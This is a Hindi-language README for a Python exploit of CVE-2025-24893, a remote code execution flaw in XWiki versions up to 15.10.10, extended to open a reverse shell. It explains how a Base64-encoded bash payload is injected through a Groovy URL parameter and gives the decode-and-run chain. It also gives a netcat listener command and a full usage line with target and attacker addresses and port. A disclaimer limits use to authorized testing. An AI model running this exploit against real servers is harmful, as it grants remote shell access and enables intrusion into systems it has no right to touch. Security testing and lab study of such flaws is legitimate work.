
CVE-2025-24893: XWiki के लिए रिवर्स शेल क्षमता वाला RCE एक्सप्लॉइट
अस्वीकरण: यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है। दुरुपयोग अवैध और खतरनाक हो सकता है।
यह Python स्क्रिप्ट CVE-2025-24893 का शोषण करती है, जो 15.10.10 तक के XWiki संस्करणों को प्रभावित करने वाली एक रिमोट कोड निष्पादन (RCE) कमजोरी है।
यह संस्करण Al Baradi Joy द्वारा मूल PoC को विस्तारित करता है ताकि एक रिवर्स शेल उत्पन्न किया जा सके। मूल PoC यहां पाया जा सकता है।
XWiki URL पैरामीटर के माध्यम से Groovy कोड निष्पादित करता है।
एक्सप्लॉइट इस Groovy टेम्पलेट में एक bash -c कमांड इंजेक्ट करता है।
एक सामान्य रिवर्स शेल में कई उद्धरण (' और ") होते हैं जो Groovy मूल्यांकन और URL को तोड़ देंगे।
इसे हल करने के लिए, स्क्रिप्ट एक-पंक्ति शेल कमांड को Base64 में एन्कोड करती है।
फिर पेलोड URL में भेजा जाता है और निम्न श्रृंखला का उपयोग करके निष्पादित किया जाता है:
{echo,<base64>} | {base64,-d} | {bash,-i}
यह Base64 पेलोड को सुरक्षित रूप से डीकोड करता है और bash -i के साथ निष्पादित करता है, जो एक इंटरैक्टिव रिवर्स शेल देता है।
http://<लक्ष्य-होस्ट>//xwiki पथ (स्क्रिप्ट इसे स्वचालित रूप से जोड़ती है)उदाहरण:
# Correct
http://10.129.95.114:8080
http://example.com:8080
# Incorrect
http://10.129.95.114:8080/ # trailing slash
http://example.com/xwiki # includes /xwiki
एक्सप्लॉइट चलाने से पहले, आपको रिवर्स शेल को पकड़ने के लिए अपनी मशीन पर एक लिसनर शुरू करना होगा।
Netcat का उपयोग करते हुए उदाहरण:
nc -lvnp <lport>
<lport> को उस पोर्ट से मेल खाना चाहिए जो आप स्क्रिप्ट को तर्क के रूप में प्रदान करते हैं।python3 cve-2025-24893.py <target_base_url> <lhost> <lport>
उदाहरण:
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444